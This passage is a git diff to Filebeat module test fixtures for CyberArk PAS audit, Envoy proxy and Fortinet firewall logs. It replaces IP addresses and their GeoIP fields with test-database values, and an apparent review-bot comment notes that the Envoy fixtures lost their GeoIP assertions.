"BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.14", "event.action": "logoff", "event.category": [ "authentication", 
@@ -635,7 +618,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 6833, + "log.offset": 6827, "log.syslog.priority": "5", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -644,7 +627,7 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.2.2", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator" @@ -665,10 +648,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:49:06Z", "cyberarkpas.audit.issuer": "PSMPGW_VAGRANT", "cyberarkpas.audit.message": "Logoff", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Logoff\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 09:49:06", "event.action": "logoff", "event.category": [ 
@@ -688,29 +671,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 8217, + "log.offset": 8209, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMPGW_VAGRANT" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -724,10 +704,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:20Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Logoff", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Logoff\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Logoff\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 05:57:20", "event.action": "logoff", "event.category": [ 
@@ -747,26 +727,29 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 9587, + "log.offset": 9577, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.71.250.247" + "81.2.69.143" ], "related.user": [ "Administrator" ], "service.type": "cyberarkpas", - "source.address": "34.71.250.247", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "34.71.250.247", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -777,22 +760,25 @@ "@timestamp": "2021-03-14T13:49:36.000Z", "cyberarkpas.audit.action": "Logoff", "cyberarkpas.audit.desc": "Logoff", - "cyberarkpas.audit.gateway_station": "34.71.250.247", + "cyberarkpas.audit.gateway_station": "81.2.69.143", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:36Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Logoff", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n 34.71.250.247\n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Logoff\n 81.2.69.143\n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 14 06:49:36", - "destination.address": "34.71.250.247", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "34.71.250.247", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "event.action": "logoff", "event.category": [ "authentication", 
@@ -811,7 +797,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 10955, + "log.offset": 10941, "log.syslog.priority": "5", "network.direction": "external", "observer.hostname": "VAULT", @@ -819,23 +805,20 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log index f3062f7ea56c..856d8c700c23 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log 
@@ -1,4 +1,4 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"PVWAAppUser","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T18:44:08Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 98\n Open File (Write Only)\n Info\n Administrator\n Open File (Write Only)\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Open File (Write Only)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write 
Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":"10.0.1.20"}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json index 57a5e57e9ee5..514ec522b1cd 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json @@ -51,7 +51,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PVWAConfig", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 10:44:08", "event.action": "open file (write only)", "event.code": "98", @@ -71,19 +71,16 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -100,7 +97,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PVWAConfig", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "35.192.121.42", + "cyberarkpas.audit.station": "67.43.156.12", "cyberarkpas.audit.timestamp": "Mar 10 14:17:40", "event.action": "open file (write only)", "event.code": "98", @@ -113,25 +110,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 1261, + "log.offset": 1260, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "35.192.121.42" + "67.43.156.12" ], "service.type": "cyberarkpas", - "source.address": "35.192.121.42", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "35.192.121.42", + "source.address": "67.43.156.12", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cyberarkpas.audit", "forwarded" @@ -165,7 +160,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 1889, + "log.offset": 1887, "log.syslog.priority": "5", "network.direction": "internal", "observer.hostname": "VAULT", diff --git a/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json b/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json index ab2070f0d925..9219be79328f 100644 --- a/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json +++ b/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json 
@@ -2,16 +2,6 @@
 {
 "@timestamp": "2019-04-10T03:49:34.451Z",
 "destination.address": "52.71.234.219",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.71.234.219",
 "destination.port": 80,
 "envoyproxy.authority": "httpbin.org",
@@ -113,4 +103,4 @@
 "envoyproxy"
 ]
 }
-]
+]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json b/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json
index af686156d99a..18abf6ae0623 100644
--- a/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json
+++ b/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json
@@ -136,13 +136,6 @@
 {
 "@timestamp": "2019-04-11T00:51:07.980Z",
 "destination.address": "151.101.66.217",
- "destination.as.number": 54113,
- "destination.as.organization.name": "Fastly",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "151.101.66.217",
 "destination.port": 80,
 "envoyproxy.authority": "www.elastic.co",
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/event.log b/x-pack/filebeat/module/fortinet/firewall/test/event.log
index 48b5d206117d..f3baa713171a 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/event.log
+++ b/x-pack/filebeat/module/fortinet/firewall/test/event.log
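Review bot: The envoy fixtures now assert that `destination.geo.*` and `destination.as.*` are absent for 52.71.234.219 in hunk `@@ -2,16 +2,6 @@` and, in the envoy.log-expected.json hunk `@@ -136,13 +136,6 @@`, for 151.101.66.217, so neither expected file exercises the module's GeoIP enrichment any more. The cyberarkpas fixtures in this same commit take the other route, swapping the real address for one the test database resolves (67.43.156.14, 81.2.69.143) and keeping the `source.geo.*` / `destination.geo.*` assertions; presumably the envoy log inputs could be anonymized the same way so the geo fields stay covered rather than silently dropping out of the test. Separately, hunk `@@ -113,4 +103,4 @@` appears to remove the trailing newline from envoy-json.log-expected.json (`\ No newline at end of file` follows `+]`), which looks like a regeneration artifact rather than an intended change.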
@@ -1,19 +1,19 @@ <189>date=2020-04-23 time=12:32:48 devname="testswitch3" devid="someotherrouteridagain" logid="0102043014" type="event" subtype="user" level="notice" vd="root" eventtime=1587231168439640874 tz="-0500" logdesc="FSSO logon authentication status" srcip=10.10.10.10 user="elasticouser" server="elasticserver" action="FSSO-logon" msg="FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10" -<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" -<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=175.16.199.1 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" 
xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" +<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=1.128.3.4 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0100040704" type="event" subtype="system" level="notice" vd="root" eventtime=1587231129938795255 tz="-0300" logdesc="System performance statistics" action="perf-stats" cpu=0 mem=10 totalsession=23 disk=0 bandwidth="23/4" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg="Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0" <189>date=2020-04-23 time=12:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0102043039" type="event" subtype="user" level="notice" vd="root" eventtime=1587231130109462858 tz="-0500" logdesc="Authentication logon" srcip=10.10.10.10 user="elastiiiuser" authserver="FSSO_elastiauth" action="auth-logon" status="logon" msg="User elastiiiuser added to auth logon" -<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" 
user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=81.2.69.145 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:24:13 devname="testswitch3" devid="someotherrouteridagain" logid="0100041006" type="event" subtype="system" level="notice" vd="root" eventtime=1587230655301863513 tz="-0300" logdesc="FortiSandbox AV database updated" version="1.522479" msg="FortiSandbox AV database updated" <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1587230627558979735 tz="-0500" logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=3 connection_type="sslvpn" count=2 user="elastico" ip=172.16.0.2 name="somerouter" fctuid="645234fdd01F885824F764" msg="Add a FortiClient Connection." 
<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=8.8.8.6 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" <189>date=2020-04-23 time=14:16:42 devname="testswitch3" devid="someotherrouteridagain" logid="0102043015" type="event" subtype="user" level="notice" vd="root" eventtime=1587230204674924332 tz="-0300" logdesc="FSSO log off authentication status" srcip=192.168.1.1 user="elasticadmin" server="FSSO_somefssoserver" action="FSSO-logoff" msg="FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1" -<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="9.9.9.9" action="connect" msg="FortiCloud 9.9.9.9 server is connected" +<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="1.128.3.4" action="connect" msg="FortiCloud 1.128.3.4 server is connected" <189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022913" type="event" 
subtype="system" level="notice" vd="root" eventtime=1587230163375149856 tz="-0500" logdesc="FortiCloud server disconnected" server="4.4.4.4" action="disconnect" reason="connection reset" msg="FortiCloud 4.4.4.4 server is disconnected" -<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK +<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=175.16.199.1 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK <190>date=2019-05-13 time=11:20:54 logid="0100032001" type="event" subtype="system" level="information" vd="vdom1" eventtime=1557771654587081441 logdesc="Admin login successful" sn="1557771654" user="admin" ui="ssh(172.16.200.254)" method="ssh" srcip=172.16.200.254 dstip=172.16.200.2 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from ssh(172.16.200.254)" -<190>date=2019-05-13 time=14:21:42 logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1557782502722231889 logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=50.1.1.101 locip=50.1.1.100 remport=500 locport=500 outintf="port14" 
cookies="9091f4d4837ea71c/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="test" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<190>date=2019-05-13 time=14:21:42 logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1557782502722231889 logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=50.1.1.101 locip=1.128.3.4 remport=500 locport=500 outintf="port14" cookies="9091f4d4837ea71c/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="test" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <190>date=2019-05-13 time=15:55:56 logid="0102043008" type="event" subtype="user" level="notice" vd="root" eventtime=1557788156913809277 logdesc="Authentication success" srcip=10.1.100.11 dstip=172.16.200.55 policyid=1 interface="port10" user="bob" group="local-group1" authproto="TELNET(10.1.100.11)" action="authentication" status="success" reason="N/A" msg="User bob succeeded in authentication" <189>date=2019-05-14 time=08:32:13 logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1557847933900764210 logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=4 connection_type="sslvpn" count=1 user="skubas" ip=172.18.64.250 name="VAN-200957-PC" fctuid="52C66FE08F724FE0B116DAD5062C96CD" msg="Add a FortiClient Connection." <189>date=2019-05-14 time=08:19:38 logid="0107045058" type="event" subtype="endpoint" level="information" vd="root" eventtime=1557847179037488154 logdesc="FortiClient connection closed" action="close" status="success" license_limit="unlimited" used_for_type=5 connection_type="sslvpn" count=1 user="skubas" ip=172.18.64.250 name="VAN-200957-PC" fctuid="52C66FE08F724FE0B116DAD5062C96CD" msg="Close a FortiClient Connection." 
